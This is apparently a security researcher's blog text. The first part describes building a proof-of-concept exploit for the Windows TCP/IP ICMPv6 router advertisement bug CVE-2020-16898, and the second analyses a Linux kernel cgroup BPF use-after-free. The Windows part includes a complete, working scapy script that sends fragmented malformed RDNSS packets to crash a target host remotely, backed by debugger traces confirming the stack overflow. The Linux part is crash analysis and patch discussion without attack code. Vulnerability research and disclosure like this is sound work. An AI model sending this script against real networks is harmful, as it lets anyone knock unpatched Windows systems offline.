I’ve analyzed Type 24 logic since it was much “smaller / shorter” than Type 3.

Stack overflow

OK. Let’s try to generate the malicious RDNSS packet “faking” Route Information as a next one:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:03AA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

This never hits tcpip!Ipv6pUpdateRDNSS function.

Problem 3 – size of the package.

After debugging I’ve realized that we are failing in the following check:

fffff804`483ba766 418b4618        mov     eax,dword ptr [r14+18h]
fffff804`483ba76a 413bc7          cmp     eax,r15d
fffff804`483ba76d 0f85d0810b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb85ab (fffff804`48472943)

where eax is the size of the package and r15 keeps an information of how much data were consumed. In that specific case we have:

rax = 0x48
r15 = 0x40

This is exactly 8 bytes difference because we use an even number. To bypass it, I’ve placed another header just after the last one. However, I was still hitting the same problem 🙁 It took me some time to figure out how to play with the packet layout to bypass it. I’ve finally managed to do so.

Problem 4 – size again!

Finally, I’ve found the correct packet layout and I could end up in the code responsible for handling Route Information header. However, I did not 🙂 Here is why. After returning from the RDNSS I ended up here:

fffff804`48472cba e875780b00      call    tcpip!Ipv6pUpdateRDNSS (fffff804`4852a534)
fffff804`48472cbf 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472cc5 e9c980f4ff      jmp     tcpip!Ipv6pHandleRouterAdvertisement+0x9fb (fffff804`483bad93)
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
fffff804`483bad21 0fb64801        movzx   ecx,byte ptr [rax+1]
fffff804`483bad25 66c1e103        shl     cx,3
fffff804`483bad29 66894c2462      mov     word ptr [rsp+62h],cx
fffff804`483bad2e 6685c9          test    cx,cx
fffff804`483bad31 0f8485060000    je      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)
fffff804`483bad37 0fb7c9          movzx   ecx,cx
fffff804`483bad3a 413b4e18        cmp     ecx,dword ptr [r14+18h] ds:002b:ffffcb82`fcbed1c8=000000b8
fffff804`483bad3e 0f8778060000    ja      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)

ecx keeps the information about the “Length” of the “fake header”. However, [r14+18h] points to the size of the data left in the package. I set Length to the max (0xFF) which is multiplied by 8 (2040 == 0x7f8). However, there is only “0xb8” bytes left. So, I’ve failed another size validation!

To be able to fix it, I’ve decreased the size of the “fake header” and at the same time attached more data to the package. That worked!

Problem 5 – NdisGetDataBuffer() and fragmentation

I’ve finally found all the puzzles to be able to trigger the bug. I thought so… I ended up executing the following code responsible for handling Route Information message:

fffff804`48472cd9 33c0            xor     eax,eax
fffff804`48472cdb 44897c2420      mov     dword ptr [rsp+20h],r15d
fffff804`48472ce0 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472ce6 4c8d85b8010000  lea     r8,[rbp+1B8h]
fffff804`48472ced 418bd7          mov     edx,r15d
fffff804`48472cf0 488985b8010000  mov     qword ptr [rbp+1B8h],rax
fffff804`48472cf7 448bcf          mov     r9d,edi
fffff804`48472cfa 488985c0010000  mov     qword ptr [rbp+1C0h],rax
fffff804`48472d01 498bce          mov     rcx,r14
fffff804`48472d04 488985c8010000  mov     qword ptr [rbp+1C8h],rax
fffff804`48472d0b 48898580010000  mov     qword ptr [rbp+180h],rax
fffff804`48472d12 48898588010000  mov     qword ptr [rbp+188h],rax
fffff804`48472d19 4c8b1558041300  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0

It tries to get the “Length” bytes from the packet to read the entire header. However, Length is fake and not validated. In my test case it has value “0x100”. Destination address is pointing to the stack which represents Route Information header. It is a very small buffer. So, we should have classic stack overflow, but inside of the NdisGetDataBuffer function I ended-up executing this:

fffff804`4820e10c 8b7910          mov     edi,dword ptr [rcx+10h]
fffff804`4820e10f 8b4328          mov     eax,dword ptr [rbx+28h]
fffff804`4820e112 8bf2            mov     esi,edx
fffff804`4820e114 488d0c3e        lea     rcx,[rsi+rdi]
fffff804`4820e118 483bc8          cmp     rcx,rax
fffff804`4820e11b 773e            ja      fffff804`4820e15b
fffff804`4820e11d f6430a05        test    byte ptr [rbx+0Ah],5 ds:002b:ffffcb83`086a4c7a=0c
fffff804`4820e121 0f84813f0400    je      fffff804`482520a8
fffff804`4820e127 488b4318        mov     rax,qword ptr [rbx+18h]
fffff804`4820e12b 4885c0          test    rax,rax
fffff804`4820e12e 742b            je      fffff804`4820e15b
fffff804`4820e130 8b4c2470        mov     ecx,dword ptr [rsp+70h]
fffff804`4820e134 8d55ff          lea     edx,[rbp-1]
fffff804`4820e137 4803c7          add     rax,rdi
fffff804`4820e13a 4823d0          and     rdx,rax
fffff804`4820e13d 483bd1          cmp     rdx,rcx
fffff804`4820e140 7519            jne     fffff804`4820e15b
fffff804`4820e142 488b5c2450      mov     rbx,qword ptr [rsp+50h]
fffff804`4820e147 488b6c2458      mov     rbp,qword ptr [rsp+58h]
fffff804`4820e14c 488b742460      mov     rsi,qword ptr [rsp+60h]
fffff804`4820e151 4883c430        add     rsp,30h
fffff804`4820e155 415f            pop     r15
fffff804`4820e157 415e            pop     r14
fffff804`4820e159 5f              pop     rdi
fffff804`4820e15a c3              ret
fffff804`4820e15b 4d85f6          test    r14,r14

In the first ‘cmp‘ instruction, rcx register keeps the value of the requested size. Rax register keeps some huge number, and because of that I could never jump out from that logic. As a result of that call, I had been getting a different address than local stack address and none of the overflow happens. I didn’t know what was going on… So, I started to read the documentation of this function and here is the magic:

“If the requested data in the buffer is contiguous, the return value is a pointer to a location that NDIS provides. If the data is not contiguous, NDIS uses the Storage parameter as follows:
If the Storage parameter is non-NULL, NDIS copies the data to the buffer at Storage. The return value is the pointer passed to the Storage parameter.
If the Storage parameter is NULL, the return value is NULL.”

Here we go… Our big package is kept somewhere in NDIS and pointer to that data is returned instead of copying it to the local buffer on the stack. I started to Google if anyone was already hitting that problem and… of course yes 🙂 Looking at this link:

http://newsoft-tech.blogspot.com/2010/02/

we can learn that the simplest solution is to fragment the package. This is exactly what I’ve done and….

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000002,0xFFFFF80448A662E0,0xFFFFF80448A66238,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`45bca210 cc              int     3
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a65818 fffff804`45ca9922 nt!DbgBreakPointWithStatus
01 fffff804`48a65820 fffff804`45ca9017 nt!KiBugCheckDebugBreak+0x12
02 fffff804`48a65880 fffff804`45bc24c7 nt!KeBugCheck2+0x947
03 fffff804`48a65f80 fffff804`45bd41e9 nt!KeBugCheckEx+0x107
04 fffff804`48a65fc0 fffff804`45bd4610 nt!KiBugCheckDispatch+0x69
05 fffff804`48a66100 fffff804`45bd29a3 nt!KiFastFailDispatch+0xd0
06 fffff804`48a662e0 fffff804`4844ac25 nt!KiRaiseSecurityCheckFailure+0x323
07 fffff804`48a66478 fffff804`483bb487 tcpip!_report_gsfailure+0x5
08 fffff804`48a66480 aaaaaaaa`aaaaaaaa tcpip!Ipv6pHandleRouterAdvertisement+0x10ef
09 fffff804`48a66830 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0a fffff804`48a66838 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0b fffff804`48a66840 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0c fffff804`48a66848 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0d fffff804`48a66850 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0e fffff804`48a66858 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0f fffff804`48a66860 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
10 fffff804`48a66868 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
11 fffff804`48a66870 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
12 fffff804`48a66878 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
13 fffff804`48a66880 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
14 fffff804`48a66888 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
...

Here we go! 🙂

Proof-of-Concept

Code can be found here:

http://site.pi3.com.pl/exp/p_CVE-2020-16898.py

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

Thanks,
Adam

CVE: 2020-14356 & 2020-25220

The short story of 1 Linux Kernel Use-After-Free bug and 2 CVEs (CVE-2020-14356 and CVE-2020-25220)

Name:     Linux kernel Cgroup BPF Use-After-Free
Author:   Adam Zabrocki ([email protected])
Date:       May 27, 2020

First things first – short history:

In 2019 Tejun Heo discovered a racing problem with lifetime of the cgroup_bpf which could result in double-free and other memory corruptions. This bug was fixed in kernel 5.3. More information about the problem and the patch can be found here:

https://lore.kernel.org/patchwork/patch/1094080/

Roman Gushchin discovered another problem with the newly fixed code which could lead to use-after-free vulnerability. His report and fix can be found here:

https://lore.kernel.org/bpf/[email protected]/

During the discussion on the fix, Alexei Starovoitov pointed out that walking through the cgroup hierarchy without holding cgroup_mutex might be dangerous:

https://lore.kernel.org/bpf/20200104003523.rfte5rw6hbnncjes@ast-mbp/

However, Roman and Alexei concluded that it shouldn’t be a problem:

https://lore.kernel.org/bpf/20200106220746.fm3hp3zynaiaqgly@ast-mbp/

Unfortunately, there is another Use-After-Free bug related to the Cgroup BPF release logic.

The “new” bug – details (a lot of details ;-)):

During LKRG development and tests, one of my VMs was generating a kernel crash during shutdown procedure. This specific machine had the newest kernel at that time (5.7.x) and I compiled it with all debug information as well as SLAB DEBUG feature. When I analyzed the crash, it had nothing to do with LKRG. Later I confirmed that kernels without LKRG are always hitting that issue:

      KERNEL: linux-5.7/vmlinux
    DUMPFILE: /var/crash/202006161848/dump.202006161848  [PARTIAL DUMP]
        CPUS: 1
        DATE: Tue Jun 16 18:47:40 2020
      UPTIME: 14:09:24
LOAD AVERAGE: 0.21, 0.37, 0.50
       TASKS: 234
    NODENAME: oi3
     RELEASE: 5.7.0-g4
     VERSION: #28 SMP PREEMPT Fri Jun 12 18:09:14 UTC 2020
     MACHINE: x86_64  (3694 Mhz)
      MEMORY: 8 GB
       PANIC: "Oops: 0000 [#1] PREEMPT SMP PTI" (check log for details)
         PID: 1060499
     COMMAND: "sshd"
        TASK: ffff9d8c36b33040  [THREAD_INFO: ffff9d8c36b33040]
         CPU: 0
       STATE:  (PANIC)

crash> bt
PID: 1060499  TASK: ffff9d8c36b33040  CPU: 0   COMMAND: "sshd"
 #0 [ffffb0fc41b1f990] machine_kexec at ffffffff9404d22f
 #1 [ffffb0fc41b1f9d8] __crash_kexec at ffffffff941c19b8
 #2 [ffffb0fc41b1faa0] crash_kexec at ffffffff941c2b60
 #3 [ffffb0fc41b1fab0] oops_end at ffffffff94019d3e
 #4 [ffffb0fc41b1fad0] page_fault at ffffffff95c0104f
    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9423e801  RSP: ffffb0fc41b1fb88  RFLAGS: 00010246
    RAX: 0000000000000000  RBX: ffff9d8d56ae1ee0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9d8e25c40b00  RDI: ffffffff9423e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001
    ORIG_RAX: ffffffffffffffff  CS: 0010  SS: 0018
 #5 [ffffb0fc41b1fbd0] ip_finish_output at ffffffff957d71b3
 #6 [ffffb0fc41b1fbf8] __ip_queue_xmit at ffffffff957d84e1
 #7 [ffffb0fc41b1fc50] __tcp_transmit_skb at ffffffff957f4b27
 #8 [ffffb0fc41b1fd58] tcp_write_xmit at ffffffff957f6579
 #9 [ffffb0fc41b1fdb8] __tcp_push_pending_frames at ffffffff957f737d
#10 [ffffb0fc41b1fdd0] tcp_close at ffffffff957e6ec1
#11 [ffffb0fc41b1fdf8] inet_release at ffffffff9581809f
#12 [ffffb0fc41b1fe10] __sock_release at ffffffff95616848
#13 [ffffb0fc41b1fe30] sock_close at ffffffff956168bc
#14 [ffffb0fc41b1fe38] __fput at ffffffff942fd3cd
#15 [ffffb0fc41b1fe78] task_work_run at ffffffff94148a4a
#16 [ffffb0fc41b1fe98] do_exit at ffffffff9412b144
#17 [ffffb0fc41b1ff08] do_group_exit at ffffffff9412b8ae
#18 [ffffb0fc41b1ff30] __x64_sys_exit_group at ffffffff9412b92f
#19 [ffffb0fc41b1ff38] do_syscall_64 at ffffffff940028d7
#20 [ffffb0fc41b1ff50] entry_SYSCALL_64_after_hwframe at ffffffff95c0007c
    RIP: 00007fe54ea30136  RSP: 00007fff33413468  RFLAGS: 00000202
    RAX: ffffffffffffffda  RBX: 00007fff334134e0  RCX: 00007fe54ea30136
    RDX: 00000000000000ff  RSI: 000000000000003c  RDI: 00000000000000ff
    RBP: 00000000000000ff   R8: 00000000000000e7   R9: fffffffffffffdf0
    R10: 000055a091a22d09  R11: 0000000000000202  R12: 000055a091d67f20
    R13: 00007fe54ea5afa0  R14: 000055a091d7ef70  R15: 000055a091d70a20
    ORIG_RAX: 00000000000000e7  CS: 0033  SS: 002b

1060499 is a sshd’s child:

...
root        5462  0.0  0.0  12168  7276 ?        Ss   04:38   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
...
root     1060499  0.0  0.1  13936  9056 ?        Ss   17:51   0:00  \_ sshd: pi3 [priv]
pi3      1062463  0.0  0.0  13936  5852 ?        S    17:51   0:00      \_ sshd: pi3@pts/3
...

Crash happens in function “__cgroup_bpf_run_filter_skb”, exactly in this piece of code:

0xffffffff9423e7ee <__cgroup_bpf_run_filter_skb+382>: callq  0xffffffff94153cb0 <preempt_count_add>
0xffffffff9423e7f3 <__cgroup_bpf_run_filter_skb+387>: callq  0xffffffff941925a0 <__rcu_read_lock>
0xffffffff9423e7f8 <__cgroup_bpf_run_filter_skb+392>: mov 0x3e8(%rbp),%rax
0xffffffff9423e7ff <__cgroup_bpf_run_filter_skb+399>: xor %ebp,%ebp
0xffffffff9423e801 <__cgroup_bpf_run_filter_skb+401>: mov 0x10(%rax),%rdi
                                                          ^^^^^^^^^^^^^^^
0xffffffff9423e805 <__cgroup_bpf_run_filter_skb+405>: lea 0x10(%rax),%r14
0xffffffff9423e809 <__cgroup_bpf_run_filter_skb+409>: test %rdi,%rdi

where RAX: 0000000000000000. However, when I was playing with repro under SLAB_DEBUG, I often got RAX: 6b6b6b6b6b6b6b6b:

    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9123e801  RSP: ffffb136c16ffb88  RFLAGS: 00010246
    RAX: 6b6b6b6b6b6b6b6b  RBX: ffff9ce3e5a0e0e0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9ce3de26b280  RDI: ffffffff9123e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001

So we have kind of a Use-After-Free bug. This bug is triggerable from user-mode. I’ve looked under IDA for the binary:

.text:FFFFFFFF8123E7EE skb = rbx      ; sk_buff * ; PIC mode
.text:FFFFFFFF8123E7EE type = r15     ; bpf_attach_type
.text:FFFFFFFF8123E7EE save_sk = rsi  ; sock *
.text:FFFFFFFF8123E7EE        call    near ptr preempt_count_add-0EAB43h
.text:FFFFFFFF8123E7F3        call    near ptr __rcu_read_lock-0AC258h ; PIC mode
.text:FFFFFFFF8123E7F8        mov     ret, [rbp+3E8h]
.text:FFFFFFFF8123E7FF        xor     ebp, ebp
.text:FFFFFFFF8123E801 _cn = rbp      ; u32
.text:FFFFFFFF8123E801        mov     rdi, [ret+10h]  ; prog
.text:FFFFFFFF8123E805        lea     r14, [ret+10h]

and this code is referencing cgroups from the socket. Source code:

int __cgroup_bpf_run_filter_skb(struct sock *sk,
				struct sk_buff *skb,
				enum bpf_attach_type type)
{
    ...
	struct cgroup *cgrp;
    ...
... cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data); ... if (type == BPF_CGROUP_INET_EGRESS) { ret = BPF_PROG_CGROUP_INET_EGRESS_RUN_ARRAY( cgrp->bpf.effective[type], skb, __bpf_prog_run_save_cb); ... ... }

Debugger:

crash> x/4i 0xffffffff9423e7f8
   0xffffffff9423e7f8:  mov    0x3e8(%rbp),%rax
   0xffffffff9423e7ff:  xor    %ebp,%ebp
   0xffffffff9423e801:  mov    0x10(%rax),%rdi
   0xffffffff9423e805:  lea    0x10(%rax),%r14
crash> p/x (int)&((struct cgroup*)0)->bpf
$2 = 0x3e0
crash> ptype struct cgroup_bpf
type = struct cgroup_bpf {
    struct bpf_prog_array *effective[28];
    struct list_head progs[28];
    u32 flags[28];
    struct bpf_prog_array *inactive;
    struct percpu_ref refcnt;
    struct work_struct release_work;
}
crash> print/a sizeof(struct bpf_prog_array)
$3 = 0x10
crash> print/a ((struct sk_buff *)0xffff9ce3e5a0e0e0)->sk
$4 = 0xffff9ce3de26b280
crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

We also know that R15: 0000000000000001 == type == BPF_CGROUP_INET_EGRESS

crash> p/a ((struct cgroup *)0xffff9ce3e2416800)->bpf.effective[1]
$6 = 0x6b6b6b6b6b6b6b6b
crash> x/20a 0xffff9ce3e2416800
0xffff9ce3e2416800:     0x6b6b6b6b6b6b016b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416810:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416820:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416830:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416840:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416850:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416860:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416870:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416880:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416890:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
crash>

This pointer (struct cgroup *)

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

Points to the freed object. However, kernel still keeps eBPF rules attached to the socket under cgroups. When process (sshd) dies (do_exit() call) and cleanup is executed, all sockets are being closed. If such socket has “pending” packets, the following code path is executed:

do_exit -> ... -> sock_close -> __sock_release -> inet_release -> tcp_close -> __tcp_push_pending_frames -> tcp_write_xmit -> __tcp_transmit_skb -> __ip_queue_xmit -> ip_finish_output -> __cgroup_bpf_run_filter_skb

However, there is nothing wrong with such logic and path. The real problem is that cgroups disappeared while still holding active clients. How is that even possible? Just before the crash I can see the following entry in kernel logs:

[190820.457422] ------------[ cut here ]------------
[190820.457465] percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[190820.457511] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457511] Modules linked in: [last unloaded: p_lkrg]
[190820.457513] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Tainted: G           OE     5.7.0-g4 #28
[190820.457513] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[190820.457515] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457516] Code: eb b6 80 3d 11 95 5a 02 00 0f 85 65 ff ff ff 48 8b 55 d8 48 8b 75 e8 48 c7 c7 d0 9f 78 93 c6 05 f5 94 5a 02 01 e8 00 57 88 ff <0f> 0b e9 43 ff ff ff 0f 0b eb 9d cc cc cc 8d 8c 16 ef be ad de 89
[190820.457516] RSP: 0018:ffffb136c0087e00 EFLAGS: 00010286
[190820.457517] RAX: 0000000000000000 RBX: 7ffffffffffeec4a RCX: 0000000000000000
[190820.457517] RDX: 0000000000000101 RSI: ffffffff949235c0 RDI: 00000000ffffffff
[190820.457517] RBP: ffff9ce3e204af20 R08: 6d6f7461206f7420 R09: 63696d6f7461206f
[190820.457517] R10: 7320726574666120 R11: 676e696863746977 R12: 00003452c5002ce8
[190820.457518] R13: ffff9ce3f6e2b450 R14: ffff9ce2c7fc3100 R15: 0000000000000000
[190820.457526] FS:  0000000000000000(0000) GS:ffff9ce3f6e00000(0000) knlGS:0000000000000000
[190820.457527] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[190820.457527] CR2: 00007f516c2b9000 CR3: 0000000222c64006 CR4: 00000000003606f0
[190820.457550] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[190820.457551] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[190820.457551] Call Trace:
[190820.457577]  rcu_core+0x1df/0x530
[190820.457598]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457609]  __do_softirq+0xfc/0x331
[190820.457629]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457630]  run_ksoftirqd+0x21/0x30
[190820.457649]  smpboot_thread_fn+0x195/0x230
[190820.457660]  kthread+0x139/0x160
[190820.457670]  ? __kthread_bind_mask+0x60/0x60
[190820.457671]  ret_from_fork+0x35/0x40
[190820.457682] ---[ end trace 63d2aef89e998452 ]---

I was testing the same scenario a few times and I had the following results:

 percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-18829) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-29849) after switching to atomic

Let’s look at this function:

/**
 * cgroup_bpf_release_fn() - callback used to schedule releasing
 *                           of bpf cgroup data
 * @ref: percpu ref counter structure
 */
static void cgroup_bpf_release_fn(struct percpu_ref *ref)
{
	struct cgroup *cgrp = container_of(ref, struct cgroup, bpf.refcnt);

	INIT_WORK(&cgrp->bpf.release_work, cgroup_bpf_release);
	queue_work(system_wq, &cgrp->bpf.release_work);
}

So that’s the callback used to release bpf cgroup data. Sounds like it is being called while there could be still active socket attached to such cgroup:

/**
 * cgroup_bpf_release() - put references of all bpf programs and
 *                        release all cgroup bpf data
 * @work: work structure embedded into the cgroup to modify
 */
static void cgroup_bpf_release(struct work_struct *work)
{
	struct cgroup *p, *cgrp = container_of(work, struct cgroup,
					       bpf.release_work);
	struct bpf_prog_array *old_array;
	unsigned int type;

	mutex_lock(&cgroup_mutex);

	for (type = 0; type < ARRAY_SIZE(cgrp->bpf.progs); type++) {
		struct list_head *progs = &cgrp->bpf.progs[type];
		struct bpf_prog_list *pl, *tmp;

		list_for_each_entry_safe(pl, tmp, progs, node) {
			list_del(&pl->node);
			if (pl->prog)
				bpf_prog_put(pl->prog);
			if (pl->link)
				bpf_cgroup_link_auto_detach(pl->link);
			bpf_cgroup_storages_unlink(pl->storage);
			bpf_cgroup_storages_free(pl->storage);
			kfree(pl);
			static_branch_dec(&cgroup_bpf_enabled_key);
		}
		old_array = rcu_dereference_protected(
				cgrp->bpf.effective[type],
				lockdep_is_held(&cgroup_mutex));
		bpf_prog_array_free(old_array);
	}

	mutex_unlock(&cgroup_mutex);

	for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
		cgroup_bpf_put(p);

	percpu_ref_exit(&cgrp->bpf.refcnt);
	cgroup_put(cgrp);
}

while:

static void bpf_cgroup_link_auto_detach(struct bpf_cgroup_link *link)
{
	cgroup_put(link->cgroup);
	link->cgroup = NULL;
}

So if cgroup dies, all the potential clients are being auto_detached. However, they might not be aware about such situation. When is cgroup_bpf_release_fn() executed?

/**
 * cgroup_bpf_inherit() - inherit effective programs from parent
 * @cgrp: the cgroup to modify
 */
int cgroup_bpf_inherit(struct cgroup *cgrp)
{
    ...
  	ret = percpu_ref_init(&cgrp->bpf.refcnt, cgroup_bpf_release_fn, 0,
			      GFP_KERNEL);
    ...
}

It is automatically executed when cgrp->bpf.refcnt drops to 1. However, in the warning logs before kernel had crashed, we saw that such reference counter is below 0. Cgroup was already freed.

Originally, I thought that the problem might be related to the code walking through the cgroup hierarchy without holding cgroup_mutex, which was pointed out by Alexei. I’ve prepared the patch and recompiled the kernel:

$ diff -u cgroup.c linux-5.7/kernel/bpf/cgroup.c
--- cgroup.c    2020-05-31 23:49:15.000000000 +0000
+++ linux-5.7/kernel/bpf/cgroup.c       2020-07-17 16:31:10.712969480 +0000
@@ -126,11 +126,11 @@
                bpf_prog_array_free(old_array);
        }

-       mutex_unlock(&cgroup_mutex);
-
        for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
                cgroup_bpf_put(p);

+       mutex_unlock(&cgroup_mutex);
+
        percpu_ref_exit(&cgrp->bpf.refcnt);
        cgroup_put(cgrp);
 }

Interestingly, without this patch I was able to generate this kernel crash every time when I was rebooting the machine (100% repro). After this patch crashing ratio dropped to around 30%. However, I was still able to hit the same code-path and generate kernel dump. The patch indeed helps but it looks like it’s not the real problem since I can still hit the crash (just much less often).

I stepped back and looked again where the bug is. Corrupted pointer (struct cgroup *) is comming from that line:

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

this code is related to the CONFIG_SOCK_CGROUP_DATA. Linux source has an interesting comment about it in “cgroup-defs.h” file:

/*
 * sock_cgroup_data is embedded at sock->sk_cgrp_data and contains
 * per-socket cgroup information except for memcg association.
 *
 * On legacy hierarchies, net_prio and net_cls controllers directly set
 * attributes on each sock which can then be tested by the network layer.
 * On the default hierarchy, each sock is associated with the cgroup it was
 * created in and the networking layer can match the cgroup directly.
 *
 * To avoid carrying all three cgroup related fields separately in sock,
 * sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer.
 * On boot, sock_cgroup_data records the cgroup that the sock was created
 * in so that cgroup2 matches can be made; however, once either net_prio or
 * net_cls starts being used, the area is overriden to carry prioidx and/or
 * classid.  The two modes are distinguished by whether the lowest bit is
 * set.  Clear bit indicates cgroup pointer while set bit prioidx and
 * classid.
 *
 * While userland may start using net_prio or net_cls at any time, once
 * either is used, cgroup2 matching no longer works.  There is no reason to
 * mix the two and this is in line with how legacy and v2 compatibility is
 * handled.  On mode switch, cgroup references which are already being
 * pointed to by socks may be leaked.  While this can be remedied by adding
 * synchronization around sock_cgroup_data, given that the number of leaked
 * cgroups is bound and highly unlikely to be high, this seems to be the
 * better trade-off.
 */

